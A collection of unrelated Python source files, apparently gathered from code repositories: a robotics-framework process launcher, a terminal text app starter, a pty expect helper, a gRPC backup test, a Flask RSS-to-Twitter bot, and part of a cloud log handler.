COLOR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
COLORS = {
'INFO': GREEN,
'WARNING': YELLOW,
'DEBUG': BLUE,
'ERROR': RED,
'CRITICAL': YELLOW
}
class ColoredFormatter(logging.Formatter):
def __init__(self, msg):
logging.Formatter.__init__(self, msg)
def format(self, record):
levelname = record.levelname
if levelname in COLORS:
if levelname == 'DEBUG':
record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
record.msg.split('#')[0] + RESET_SEQ
record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + \
record.msg.split('#')[-1] + RESET_SEQ
else:
record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
g_process_name + RESET_SEQ
record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + levelname + \
" " + record.msg.split('#')[-1] + RESET_SEQ
return logging.Formatter.format(self, record)
color_formatter = ColoredFormatter("[%(levelname)-18s] %(message)s")
console = logging.StreamHandler()
console.setFormatter(color_formatter)
logger = logging.Logger(__name__)
logger.addHandler(console)
def exit_handler():
stop()
os.chdir(g_pwd)
logger.info('cyber_launch exit.')
atexit.register(exit_handler)
def singleton(cls):
instances = {}
def getinstance(*args, **kwargs):
if cls not in instances:
instances[cls] = cls(*args, **kwargs)
return instances[cls]
return getinstance
def module_monitor(mod):
while True:
line = mod.popen.stdout.readline()
if line:
logger.debug('%s# %s' % (mod.name, line.decode('utf8').strip('\n')))
continue
time.sleep(0.01)
class ProcessWrapper(object):
def __init__(self, binary_path, dag_num, dag_list, process_name,
process_type, sched_name, exception_handler=''):
self.time_of_death = None
self.started = False
self.binary_path = binary_path
self.dag_num = dag_num
self.dag_list = dag_list
self.name = process_name
self.sched_name = sched_name
self.process_type = process_type
self.popen = None
self.exit_code = None
self.args = []
self.pid = -1
self.exception_handler = exception_handler
def wait(self):
if self.started:
self.popen.wait()
def start(self):
"""
Start a manager in process name
"""
if self.process_type == 'binary':
args_list = self.name.split()
else:
args_list = [self.binary_path, '-d'] + self.dag_list
if len(self.name) != 0:
args_list.append('-p')
args_list.append(self.name)
if len(self.sched_name) != 0:
args_list.append('-s')
args_list.append(self.sched_name)
self.args = args_list
try:
self.popen = subprocess.Popen(args_list, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
except Exception as err:
logger.error('Subprocess Popen exception: ' + str(err))
return 2
else:
if self.popen.pid == 0 or self.popen.returncode is not None:
logger.error('Start process [%s] failed.' % self.name)
return 2
th = threading.Thread(target=module_monitor, args=(self, ))
th.setDaemon(True)
th.start()
self.started = True
self.pid = self.popen.pid
logger.info('Start process [%s] successfully. pid: %d' %
(self.name, self.popen.pid))
logger.info('-' * 120)
return 0
def is_alive(self):
"""
Check the process if is still running
@return: True if process is still running
@rtype: bool
"""
if not self.started:
return False
if self.popen is None:
if self.time_of_death is None:
self.time_of_death = time.time()
return False
self.exit_code = self.popen.poll()
if self.exit_code is not None:
if self.time_of_death is None:
self.time_of_death = time.time()
return False
return True
def get_exit_state(self):
"""
@return: description of exit state
@rtype: str
"""
if self.popen.returncode is None:
pass
elif self.popen.returncode != 0:
output = 'Process [%s] has died [pid %s, exit code %s, cmd %s].' % \
(self.name, self.pid, self.exit_code, ' '.join(self.args))
logger.error(output)
else:
output = 'Process [%s] has finished. [pid %s, cmd %s].' % \
(self.name, self.pid, ' '.join(self.args))
logger.error(output)
@singleton
class ProcessMonitor(object):
def __init__(self):
self.procs = []
self.dead_cnt = 0
self.done = False
self.is_shutdown = False
def register(self, p):
"""
Register process with L{ProcessMonitor}
@param p: Process
@type p: L{Process}
"""
if self.has_process(p.name):
logger.error(
'Cannot add process due to duplicate name "%s".' % p.name)
elif self.is_shutdown:
logger.error(
'Cannot add process [%s] due to monitor has been stopped.' % p.name)
else:
self.procs.append(p)
def has_process(self, name):
"""
@return: True if process is still be monitored. If False, process
has died or was never registered with process
@rtype: bool
"""
return len([p for p in self.procs if p.name == name]) > 0
def check_cleanup(self):
"""
Check processes are alived, cleanup processes
"""
dead_cnt = 0
for pw in self.procs:
if self.is_shutdown:
break
if pw.process_type == 'binary':
continue
try:
if not pw.is_alive():
if pw.exception_handler == "respawn":
logger.warn(
'child process [%s][%d] exit, respawn!' % (pw.name, pw.pid))
result = pw.start()
if result != 0:
logger.error(
'respawn process [%s] failed, stop all!' % (pw.name))
stop()
elif pw.exception_handler == "exit":
logger.warn(
'child process [%s][%d] exit, stop all' % (pw.name, pw.pid))
stop()
dead_cnt += 1
except Exception:
dead_cnt += 1
traceback.print_exc()
if dead_cnt > 0:
self.dead_cnt = dead_cnt
if self.dead_cnt == len(self.procs):
self.is_shutdown = True
def run(self):
"""
Run processes monitor, until all processes are died.
"""
while not self.is_shutdown:
self.check_cleanup()
time.sleep(0.2)
for p in self.procs:
p.get_exit_state()
if self.dead_cnt == len(self.procs):
logger.info("All processes has died.")
return True
return False
def stop(self, signal):
"""
Stop all processes in monitor
"""
for p in self.procs:
if p.is_alive():
p.popen.send_signal(signal)
for p in self.procs:
if p.is_alive():
logger.warn('Waiting for [%s][%s] exit.' % (p.name, p.pid))
p.wait()
logger.info(
'Process [%s] has been stopped. dag_file: %s' % (p.name, p.dag_list))
# Reset members
self.procs = []
self.dead_cnt = 0
def start(launch_file=''):
"""
Start all modules in xml config
"""
pmon = ProcessMonitor()
# Find launch file
if launch_file[0] == '/':
launch_file = launch_file
elif launch_file == os.path.basename(launch_file):
launch_file = os.path.join(cyber_path, 'launch', launch_file)
else:
if os.path.exists(os.path.join(g_pwd, launch_file)):
launch_file = os.path.join(g_pwd, launch_file)
else:
logger.error('Cannot find launch file: %s ' % launch_file)
sys.exit(1)
logger.info('Launch file [%s]' % launch_file)
logger.info('=' * 120)
if not os.path.isfile(launch_file):
logger.error('Launch xml file %s does not exist' % launch_file)
sys.exit(1)
try:
tree = ET.parse(launch_file)
except Exception:
logger.error('Parse xml failed. illegal xml!')
sys.exit(1)
total_dag_num = 0
dictionary = {}
dag_dict = {}
root1 = tree.getroot()
for module in root1.findall('module'):
dag_conf = module.find('dag_conf').text
process_name = module.find('process_name').text
process_type = module.find('type')
if process_type is None:
process_type = 'library'
else:
process_type = process_type.text
if process_type is None:
process_type = 'library'
process_type = process_type.strip()
if process_type != 'binary':
if dag_conf is None or not dag_conf.strip():
logger.error('Library dag conf is null')
continue
if process_name is None:
process_name = 'mainboard_default_' + str(os.getpid())
process_name = process_name.strip()
if str(process_name) in dictionary:
dictionary[str(process_name)] += 1
else:
dictionary[str(process_name)] = 1
if str(process_name) not in dag_dict:
dag_dict[str(process_name)] = [str(dag_conf)]
else:
dag_dict[str(process_name)].append(str(dag_conf))
if dag_conf is not None:
total_dag_num += 1
process_list = []
root = tree.getroot()
for env in root.findall('environment'):
for var in env.getchildren():
os.environ[var.tag] = str(var.text)
for module in root.findall('module'):
module_name = module.find('name').text
dag_conf = module.find('dag_conf').text
process_name = module.find('process_name').text
sched_name = module.find('sched_name')
process_type = module.find('type')
exception_handler = module.find('exception_handler')
if process_type is None:
process_type = 'library'
else:
process_type = process_type.text
if process_type is None:
process_type = 'library'
process_type = process_type.strip()
if sched_name is None:
sched_name = "CYBER_DEFAULT"
else:
sched_name = sched_name.text
if process_name is None:
process_name = 'mainboard_default_' + str(os.getpid())
if dag_conf is None:
dag_conf = ''
if module_name is None:
module_name = ''
if exception_handler is None:
exception_handler = ''
else:
exception_handler = exception_handler.text
module_name = module_name.strip()
dag_conf = dag_conf.strip()
process_name = process_name.strip()
sched_name = sched_name.strip()
exception_handler = exception_handler.strip()
logger.info('Load module [%s] %s: [%s] [%s] conf: [%s] exception_handler: [%s]' %
(module_name, process_type, process_name, sched_name, dag_conf,
exception_handler))
if process_name not in process_list:
if process_type == 'binary':
if len(process_name) == 0:
logger.error(
'Start binary failed. Binary process_name is null.')
continue
pw = ProcessWrapper(
process_name.split()[0], 0, [
""], process_name, process_type,
exception_handler)
# Default is library
else:
pw = ProcessWrapper(
g_binary_name, 0, dag_dict[
str(process_name)], process_name,
process_type, sched_name, exception_handler)
result = pw.start()
if result != 0:
logger.error(
'Start manager [%s] failed. Stop all!' % process_name)
stop()
pmon.register(pw)
process_list.append(process_name)
# No module in xml
if not process_list:
logger.error("No module was found in xml config.")
return
all_died = pmon.run()
if not all_died:
logger.info("Stop all processes...")
stop()
logger.info("Cyber exit.")
def stop(sig=signal.SIGINT):
"""
stop all modules
"""
pmon = ProcessMonitor()
if len(pmon.procs) == 0:
return
pmon.stop(sig)
logger.info('All processes have been stopped.')
sys.exit(0)
def stop_launch(launch_file):
"""
Stop the launch file
"""
if not launch_file:
cmd = 'pkill -INT cyber_launch'
else:
cmd = 'pkill -INT -f ' + launch_file
os.system(cmd)
time.sleep(3)
logger.info('Stop cyber launch finished.')
sys.exit(0)
def signal_handler(sig, frame):
logger.info('Keyboard interrupt received. Stop all processes.')
stop(sig)
def main():
"""
Main function
"""
if cyber_path is None:
logger.error(
'Error: environment variable CYBER_PATH not found, set environment first.')
sys.exit(1)
os.chdir(cyber_path)
parser = argparse.ArgumentParser(description='cyber launcher')
subparsers = parser.add_subparsers(help='sub-command help')
start_parser = subparsers.add_parser(
'start', help='launch/benchmark.launch')
start_parser.add_argument('file', nargs='?', action='store',
help='launch file, default is cyber.launch')
stop_parser = subparsers.add_parser(
'stop', help='stop all the module in launch file')
stop_parser.add_argument('file', nargs='?', action='store',
help='launch file, default stop all the launcher')
# restart_parser = subparsers.add_parser('restart', help='restart the module')
# restart_parser.add_argument('file', nargs='?', action='store', help='launch file,
# default is cyber.launch')
params = parser.parse_args(sys.argv[1:])
command = sys.argv[1]
if command == 'start':
start(params.file)
elif command == 'stop':
stop_launch(params.file)
# elif command == 'restart':
# restart(params.file)
else:
logger.error('Invalid command %s' % command)
sys.exit(1)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
main()
|
run.py
|
from sancty.deps_types import Queue, Event, QueueEmpty, Terminal, Callable
from sancty.read import Reader, ReaderProtocol
from sancty.render import Renderer, RendererProtocol
import multiprocessing as mp
def create_process_reader(clss: ReaderProtocol):
class ProcessReadr(clss):
render_queue: Queue
exit_event: Event
resizing_event: Event
def __init__(self, term, render_queue, exit_event, resizing_event):
super().__init__(term)
self.exit_event = exit_event
self.render_queue = render_queue
self.resizing_event = resizing_event
def has_exited(self):
return self.exit_event.is_set()
def resizing_set(self):
self.resizing_event.set()
self.resizing = True
def resizing_clear(self):
self.resizing_event.clear()
self.resizing = False
def send_values(self, values):
self.render_queue.put(values)
def queue_size(self) -> int:
return self.render_queue.qsize()
def exit_set(self):
self.exit_event.set()
self.exited = True
return ProcessReadr
def create_process_renderer(clss: RendererProtocol):
class ProcessRendr(clss):
render_queue: Queue
exit_event: Event
resizing: Event
def __init__(self, term, render_queue, exit_event, resizing, replace_dict=None, special_slash_fn=None,
replace_dict_add=True, overwrite=False):
super().__init__(term, replace_dict, special_slash_fn, replace_dict_add, overwrite)
self.render_queue = render_queue
self.exit_event = exit_event
self.resizing = resizing
def has_exited(self) -> bool:
return self.exit_event.is_set()
def is_resizing(self) -> bool:
return self.resizing.is_set()
def update_values(self, values) -> tuple[bool, list]:
try:
new_values = self.render_queue.get(block=False)
values += new_values
return False, values
except QueueEmpty:
return True, values
def do_exit(self):
self.exit_event.set()
return ProcessRendr
def reader_process_start(term, reader, render_queue, exit_event, resizing):
if reader is not None:
reader_cls = create_process_reader(reader)
else:
reader_cls = create_process_reader(Reader)
# term = Terminal()
print("\n" * 20 + term.move_x(0) + term.move_up(20))
reader_inst: ReaderProtocol = reader_cls(term, render_queue, exit_event, resizing)
reader_inst.read_terminal()
def render_process_start(term, renderer, render_queue, exit_event, resizing, replace_dict, special_slash_fn,
replace_dict_add, overwrite):
if renderer is not None:
renderer_cls = create_process_renderer(renderer)
else:
renderer_cls = create_process_renderer(Renderer)
renderer_inst: RendererProtocol = renderer_cls(term, render_queue, exit_event, resizing, replace_dict,
special_slash_fn, replace_dict_add, overwrite)
renderer_inst.print_terminal()
def start_terminal(renderer=None, reader=None, replace_dict: dict[str, str | tuple[int, str]] = None,
special_slash_fn: Callable[[int, list, list], tuple[list, list]] = None,
replace_dict_add: bool = True, overwrite: bool = False, welcome_message="Welcome to Sancty Text!"):
render_queue = mp.Manager().Queue()
exit_event = mp.Manager().Event()
resizing = mp.Manager().Event()
term = Terminal()
print(welcome_message)
print("Press 'ESC', 'CTRL+C' or 'CTRL+D' to quit. "
"Type \\help for a list of '\\\\' commands (also clears all text).")
# print("\n" * 20 + term.move_x(0) + term.move_up(20))
input_process = mp.Process(target=reader_process_start, args=(term, reader, render_queue, exit_event, resizing,))
render_process = mp.Process(target=render_process_start, args=(term, renderer, render_queue, exit_event, resizing,
replace_dict, special_slash_fn, replace_dict_add,
overwrite,))
processes = []
input_process.start()
processes.append(input_process)
render_process.start()
processes.append(render_process)
for process in processes:
process.join()
|
uexpect.py
|
# Copyright (c) 2019 Vitaliy Zakaznikov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pty
import time
import sys
import re
from threading import Thread, Event
from subprocess import Popen
from Queue import Queue, Empty
class TimeoutError(Exception):
def __init__(self, timeout):
self.timeout = timeout
def __str__(self):
return 'Timeout %.3fs' % float(self.timeout)
class ExpectTimeoutError(Exception):
def __init__(self, pattern, timeout, buffer):
self.pattern = pattern
self.timeout = timeout
self.buffer = buffer
def __str__(self):
s = 'Timeout %.3fs ' % float(self.timeout)
if self.pattern:
s += 'for %s ' % repr(self.pattern.pattern)
if self.buffer:
s += 'buffer %s ' % repr(self.buffer[:])
s += 'or \'%s\'' % ','.join(['%x' % ord(c) for c in self.buffer[:]])
return s
class IO(object):
class EOF(object):
pass
class Timeout(object):
pass
EOF = EOF
TIMEOUT = Timeout
class Logger(object):
def __init__(self, logger, prefix=''):
self._logger = logger
self._prefix = prefix
def write(self, data):
self._logger.write(('\n' + data).replace('\n','\n' + self._prefix))
def flush(self):
self._logger.flush()
def __init__(self, process, master, queue, reader):
self.process = process
self.master = master
self.queue = queue
self.buffer = None
self.before = None
self.after = None
self.match = None
self.pattern = None
self.reader = reader
self._timeout = None
self._logger = None
self._eol = ''
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def logger(self, logger=None, prefix=''):
if logger:
self._logger = self.Logger(logger, prefix=prefix)
return self._logger
def timeout(self, timeout=None):
if timeout:
self._timeout = timeout
return self._timeout
def eol(self, eol=None):
if eol:
self._eol = eol
return self._eol
def close(self, force=True):
self.reader['kill_event'].set()
os.system('pkill -TERM -P %d' % self.process.pid)
if force:
self.process.kill()
else:
self.process.terminate()
os.close(self.master)
if self._logger:
self._logger.write('\n')
self._logger.flush()
def send(self, data, eol=None):
if eol is None:
eol = self._eol
return self.write(data + eol)
def write(self, data):
return os.write(self.master, data)
def expect(self, pattern, timeout=None, escape=False):
self.match = None
self.before = None
self.after = None
if escape:
pattern = re.escape(pattern)
pattern = re.compile(pattern)
if timeout is None:
timeout = self._timeout
timeleft = timeout
while True:
start_time = time.time()
if self.buffer is not None:
self.match = pattern.search(self.buffer, 0)
if self.match is not None:
self.after = self.buffer[self.match.start():self.match.end()]
self.before = self.buffer[:self.match.start()]
self.buffer = self.buffer[self.match.end():]
break
if timeleft < 0:
break
try:
data = self.read(timeout=timeleft, raise_exception=True)
except TimeoutError:
if self._logger:
self._logger.write((self.buffer or '') + '\n')
self._logger.flush()
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
timeleft -= (time.time() - start_time)
if data:
self.buffer = (self.buffer + data) if self.buffer else data
if self._logger:
self._logger.write((self.before or '') + (self.after or ''))
self._logger.flush()
if self.match is None:
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
return self.match
def read(self, timeout=0, raise_exception=False):
data = ''
timeleft = timeout
try:
while timeleft >= 0 :
start_time = time.time()
data += self.queue.get(timeout=timeleft)
if data:
break
timeleft -= (time.time() - start_time)
except Empty:
if data:
return data
if raise_exception:
raise TimeoutError(timeout)
pass
if not data and raise_exception:
raise TimeoutError(timeout)
return data
def spawn(command):
master, slave = pty.openpty()
process = Popen(command, preexec_fn=os.setsid, stdout=slave, stdin=slave, stderr=slave, bufsize=1)
os.close(slave)
queue = Queue()
reader_kill_event = Event()
thread = Thread(target=reader, args=(process, master, queue, reader_kill_event))
thread.daemon = True
thread.start()
return IO(process, master, queue, reader={'thread':thread, 'kill_event':reader_kill_event})
def reader(process, out, queue, kill_event):
while True:
try:
data = os.read(out, 65536)
queue.put(data)
except:
if kill_event.is_set():
break
raise
|
test_upload_and_restore.py
|
import filecmp
import os
import tempfile
import threading
from concurrent import futures
import grpc
import pytest
from pysrbup.backup_system_pb2_grpc import (BackupStub,
add_BackupServicer_to_server)
from pysrbup.client import BackupClient
from pysrbup.server import BackupServicer, create_dictionary
OPTIONS = [('grpc.max_send_message_length', 1024**3),
('grpc.max_receive_message_length', 1024**3)]
SERVER_ADDRESS = '127.0.0.1:50000'
THREADS = 2
def start_server():
with tempfile.TemporaryDirectory() as backup_dir:
dictionary_file = create_dictionary(backup_dir)
server = grpc.server(futures.ThreadPoolExecutor(max_workers=THREADS),
options=OPTIONS)
add_BackupServicer_to_server(
BackupServicer(backup_dir, dictionary_file), server)
server.add_insecure_port(SERVER_ADDRESS)
server.start()
server.wait_for_termination()
@pytest.fixture
def server_fixture():
server_thread = threading.Thread(target=start_server, daemon=True)
server_thread.start()
@pytest.fixture
def client_fixture():
channel = grpc.insecure_channel(SERVER_ADDRESS, options=OPTIONS)
stub = BackupStub(channel)
return BackupClient(stub)
# pylint: disable=unused-argument,redefined-outer-name
def test_upload_and_restore(server_fixture, client_fixture):
key = client_fixture.generate_key()
dir_to_backup = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'data')
backup_id = client_fixture.upload_backup(dir_to_backup, key, THREADS)
with tempfile.TemporaryDirectory() as restore_to_dir:
client_fixture.restore_backup(backup_id, restore_to_dir, key)
assert are_equal_dirs(
dir_to_backup,
os.path.join(restore_to_dir, os.path.basename(dir_to_backup)))
def are_equal_dirs(dir1, dir2):
comp_obj = filecmp.dircmp(dir1, dir2)
if len(comp_obj.left_only) > 0 or len(comp_obj.right_only) > 0:
return False
common_dirs = comp_obj.common_dirs
comp_result = filecmp.cmpfiles(dir1, dir2, comp_obj.common_files)
return (not comp_result[1] and not comp_result[2]) and all(
are_equal_dirs(os.path.join(dir1, common_dirs[i]),
os.path.join(dir2, common_dirs[i]))
for i in range(len(common_dirs)))
|
server.py
|
from flask import Flask,render_template,request,jsonify
import multiprocessing as mp
import feedparser
import tweepy
import time
from dateutil import parser
#config
app = Flask(__name__)
#setup variables
setup=[]
feed=[]
running=False
process=None
user = "Bot Inactive"
#authenticating twitter account
def authenticate():
global user
auth = tweepy.OAuthHandler(setup[0], setup[1])
auth.set_access_token(setup[2], setup[3])
api = tweepy.API(auth)
user=api.me().screen_name
return api
#start bot process
def start():
global process
try:
authenticate()
except Exception as e:
print("\n!! ERROR : "+str(e)+"\n")
return False
if not running:
process=mp.Process(target=feedUpdate, args=(setup,feed))
process.start()
return True
return False
#terminate bot process
def stop():
global process
try:
if running:
process.terminate()
process=None
print("\nBot Stopped\n")
return True
return False
except Exception as e:
print("\n!! ERROR : "+str(e)+"\n")
return False
#bot
def feedUpdate(setup,urls):
print("\nBot Started\n")
auth = tweepy.OAuthHandler(setup[0], setup[1])
auth.set_access_token(setup[2], setup[3])
ap = tweepy.API(auth)
lastUpdate = time.time()
tweetInterval=int(setup[4])
startTime = lastUpdate
while True:
if (time.time()-lastUpdate) < tweetInterval :
continue
print("\n!! Fetching Updates !!\n")
for url in urls:
feed = feedparser.parse(url)
for feeds in feed['entries']:
dt = parser.parse(feeds["published"]).timestamp()
if lastUpdate < dt:
print("\n**New Feed Posted From "+str(feed['feed']['title'])+'\n-->'+feeds['title']+'\n')
msg = feeds['title']+" "+feeds['link']
try:
ap.update_status(msg)
except Exception as e:
print("\n!! ERROR : "+str(e)+" !!\n")
lastUpdate = time.time()
#routes
#homepage
@app.route('/index/')
@app.route('/')
def index():
if setup==[]:
return render_template('index.html',erorr="Bot not Configured. Visit Settings tab to configure.",run=running,user=user)
return render_template('index.html',run=running,user=user)
#settings route
@app.route('/settings/',methods = ['POST', 'GET'])
def settings():
global setup
global running
if request.method == 'POST':
try:
setup=[]
setup.append(request.form['consumer_key']+"\n")
setup.append(request.form['consumer_secret_key']+"\n")
setup.append(request.form['access_token']+"\n")
setup.append(request.form['access_token_secret']+"\n")
setup.append(request.form['interval']+"\n")
file = open("secret.txt","w")
file.writelines(setup)
file.close()
setup = [x.rstrip() for x in setup]
if running:
stop()
running=not running
start()
running=not running
except Exception as e:
print("\n!! ERROR : "+str(e)+" !!\n")
return render_template('settings.html',setup=setup,message="ERROR Please Check Again")
return render_template('settings.html',setup=setup,message="UPDATED SUCCESFULLY")
else:
return render_template('settings.html',setup=setup)
#feed edit route
@app.route('/feed_list/',methods = ['POST', 'GET'])
def feed_list():
global feed
global running
update=""
if request.method == 'POST':
feed=[x.rstrip().replace('\t','') for x in request.form['feed_list'].split('\n') if x.rstrip().replace('\t','')!=""]
print("\nFeed List updated:-\n",feed)
try:
file = open("feed_list.txt","w")
file.writelines([x+"\n" for x in feed])
file.close()
if running:
stop()
running=not running
start()
running=not running
update="UPDATED SUCCESFULLY"
except Exception as e:
print("\n!! ERROR : "+str(e)+"\n")
update="ERROR : COULDN'T UPDATE"
return render_template('feed_list.html',feed=feed,message=update)
#bot access route
@app.route('/changestate')
def changestate():
global running
global user
if request.method != 'GET':
return "ERORR"
state = request.args.get('state')
if state!=str(running) or setup==[]:
return jsonify(
resp="False",
erorr="Configuration Erorr"
)
elif feed==[]:
return jsonify(
resp="False",
erorr="Feed List is Empty. Add RSS Feeds"
)
else:
if not running:
if start():
resp=jsonify(pstate=str(not running),resp='True',stat='Running',color='#25abff',user=user)
running= not running
return resp
else:
return jsonify(resp="False",erorr="PROCESS/AUTH ERORR")
else:
if stop():
user="Bot Inactive"
resp=jsonify(pstate=str(not running),resp='True',stat='Start',color='red',user=user)
running= not running
return resp
else:
return jsonify(resp="False",erorr="PROCESS ERORR")
#post manual tweet
@app.route('/tweets/',methods = ['POST', 'GET'])
def tweet_man():
if setup==[]:
return render_template('tweet.html',message="Bot not Configured. Visit Settings tab to configure.")
if request.method == 'POST':
try:
api = authenticate()
try:
msg=request.form['status']
print(msg)
if msg==None or msg==' ':
raise Exception('Value Not Present')
except Exception as e:
print("\n!! ERROR : "+str(e)+"\n")
return render_template('tweet.html',message="ERROR : Empty Status")
api.update_status(msg)
return render_template('tweet.html',message="Status Updated")
except Exception as e:
print("\n!! ERROR : "+str(e)+"\n")
return render_template('tweet.html',message="Authentication ERROR. Re-Configure Bot.")
return render_template('tweet.html')
#main running development server
if __name__ == '__main__':
running=False
#initializing if setup exists
try:
file = open("secret.txt","r")
setup = [x.rstrip() for x in file.readlines()]
file.close()
except:
pass
try:
file = open("feed_list.txt","r")
feed = [x.rstrip() for x in file.readlines()]
file.close()
except:
pass
app.run()
|
logger_hanlder.py
|
import re
import sys
import json
import atexit
import logging
import traceback
from enum import Enum
from time import time, sleep
from threading import Thread
import six
from .logclient import LogClient
from .logitem import LogItem
from .putlogsrequest import PutLogsRequest
from .version import LOGGING_HANDLER_USER_AGENT
try:
from collections.abc import Callable
except ImportError:
from collections import Callable
if six.PY2:
from Queue import Empty, Full, Queue
else:
from queue import Empty, Full, Queue
class LogFields(Enum):
"""fields used to upload automatically
Possible fields:
record_name, level, func_name, module,
file_path, line_no, process_id,
process_name, thread_id, thread_name
"""
record_name = 'name'
level = 'levelname'
file_name = 'filename'
func_name = 'funcName'
module = 'module'
file_path = 'pathname'
line_no = 'lineno'
process_id = 'process'
process_name = 'processName'
thread_id = 'thread'
thread_name = 'threadName'
level_no = 'levelno'
asc_time = 'asctime'
created_timestamp = 'created'
micro_second = 'msecs'
relative_created = 'relativeCreated'
DEFAULT_RECORD_LOG_FIELDS = set((LogFields.record_name, LogFields.level,
LogFields.func_name, LogFields.module,
LogFields.file_path, LogFields.line_no,
LogFields.process_id, LogFields.process_name,
LogFields.thread_id, LogFields.thread_name))
BLACK_FIELD_LIST = set(['exc_info', 'exc_text', 'stack_info', 'msg', 'args', 'message'])
BUILTIN_LOG_FIELDS_NAMES = set(x for x in dir(LogFields) if not x.startswith('__'))
BUILTIN_LOG_FIELDS_NAMES.update(set(LogFields[x].value for x in BUILTIN_LOG_FIELDS_NAMES))
BUILTIN_LOG_FIELDS_NAMES.update(BLACK_FIELD_LIST)
class SimpleLogHandler(logging.Handler, object):
"""
SimpleLogHandler, blocked sending any logs, just for simple test purpose
:param end_point: log service endpoint
:param access_key_id: access key id
:param access_key: access key
:param project: project name
:param log_store: logstore name
:param topic: topic, by default is empty
:param fields: list of LogFields or list of names of LogFields, default is LogFields.record_name, LogFields.level, LogFields.func_name, LogFields.module, LogFields.file_path, LogFields.line_no, LogFields.process_id, LogFields.process_name, LogFields.thread_id, LogFields.thread_name, you could also just use he string name like 'thread_name', it's also possible customize extra fields in this list by disable extra fields and put white list here.
:param buildin_fields_prefix: prefix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param buildin_fields_suffix: suffix of builtin fields, default is empty. suggest using "__" when extract json is True to prevent conflict.
:param extract_json: if extract json automatically, default is False
:param extract_json_drop_message: if drop message fields if it's JSON and extract_json is True, default is False
:param extract_json_prefix: prefix of fields extracted from json when extract_json is True. default is ""
:param extract_json_suffix: suffix of fields extracted from json when extract_json is True. default is empty
:param extract_kv: if extract kv like k1=v1 k2="v 2" automatically, default is False
:param extract_kv_drop_message: if drop message fields if it's kv and extract_kv is True, default is False
:param extract_kv_prefix: prefix of fields extracted from KV when extract_json is True. default is ""
:param extract_kv_suffix: suffix of fields extracted from KV when extract_json is True. default is ""
:param extract_kv_sep: separator for KV case, defualt is '=', e.g. k1=v1
:param extra: if show extra info, default True to show all. default is True. Note: the extra field will also be handled with buildin_fields_prefix/suffix
:param kwargs: other parameters passed to logging.Handler
"""
def __init__(self, end_point, access_key_id, access_key, project, log_store, topic=None, fields=None,
buildin_fields_prefix=None, buildin_fields_suffix=None,
extract_json=None, extract_json_drop_message=None,
extract_json_prefix=None, extract_json_suffix=None,
extract_kv=None, extract_kv_drop_message=None,
extract_kv_prefix=None, extract_kv_suffix=None,
extract_kv_sep=None, extra=None,
**kwargs):
logging.Handler.__init__(self, **kwargs)
self.end_point = end_point
self.access_key_id = access_key_id
self.access_key = access_key
self.project = project
self.log_store = log_store
self.client = None
self.topic = topic
self.fields = DEFAULT_RECORD_LOG_FIELDS if fields is None else set(fields)
self.extract_json = False if extract_json is None else extract_json
self.extract_json_prefix = "" if extract_json_prefix is None else extract_json_prefix
self.extract_json_suffix = "" if extract_json_suffix is None else extract_json_suffix
self.extract_json_drop_message = False if extract_json_drop_message is None else extract_json_drop_message
self.buildin_fields_prefix = "" if buildin_fields_prefix is None else buildin_fields_prefix
self.buildin_fields_suffix = "" if buildin_fields_suffix is None else buildin_fields_suffix
self.extract_kv = False if extract_kv is None else extract_kv
self.extract_kv_prefix = "" if extract_kv_prefix is None else extract_kv_prefix
self.extract_kv_suffix = "" if extract_kv_suffix is None else extract_kv_suffix
self.extract_kv_drop_message = False if extract_kv_drop_message is None else extract_kv_drop_message
self.extract_kv_sep = "=" if extract_kv_sep is None else extract_kv_sep
self.extract_kv_ptn = self._get_extract_kv_ptn()
self.extra = True if extra is None else extra
def set_topic(self, topic):
self.topic = topic
def create_client(self):
self.client = LogClient(self.end_point, self.access_key_id, self.access_key)
self.client.set_user_agent(LOGGING_HANDLER_USER_AGENT)
def send(self, req):
if self.client is None:
self.create_client()
return self.client.put_logs(req)
def set_fields(self, fields):
self.fields = fields
@staticmethod
def _n(v):
if v is None:
return ""
if isinstance(v, (dict, list, tuple)):
try:
v = json.dumps(v)
except Exception:
pass
elif six.PY2 and isinstance(v, six.text_type):
v = v.encode('utf8', "ignore")
elif six.PY3 and isinstance(v, six.binary_type):
v = v.decode('utf8', "ignore")
return str(v)
def extract_dict(self, message):
data = []
if isinstance(message, dict):
for k, v in six.iteritems(message):
data.append(("{0}{1}{2}".format(self.extract_json_prefix, self._n(k),
self.extract_json_suffix), self._n(v)))
return data
def _get_extract_kv_ptn(self):
sep = self.extract_kv_sep
p1 = u'(?!{0})([\u4e00-\u9fa5\u0800-\u4e00\\w\\.\\-]+)\\s*{0}\\s*([\u4e00-\u9fa5\u0800-\u4e00\\w\\.\\-]+)'
p2 = u'(?!{0})([\u4e00-\u9fa5\u0800-\u4e00\\w\\.\\-]+)\\s*{0}\\s*"\s*([^"]+?)\s*"'
ps = '|'.join([p1, p2]).format(sep)
return re.compile(ps)
def extract_kv_str(self, message):
if isinstance(message, six.binary_type):
message = message.decode('utf8', 'ignore')
r = self.extract_kv_ptn.findall(message)
data = []
for k1, v1, k2, v2 in r:
if k1:
data.append(("{0}{1}{2}".format(self.extract_kv_prefix, self._n(k1),
self.extract_kv_suffix), self._n(v1)))
elif k2:
data.append(("{0}{1}{2}".format(self.extract_kv_prefix, self._n(k2),
self.extract_kv_suffix), self._n(v2)))
return data
def _add_record_fields(self, record, k, contents):
v = getattr(record, k, None)
if v is None or isinstance(v, Callable):
return
v = self._n(v)
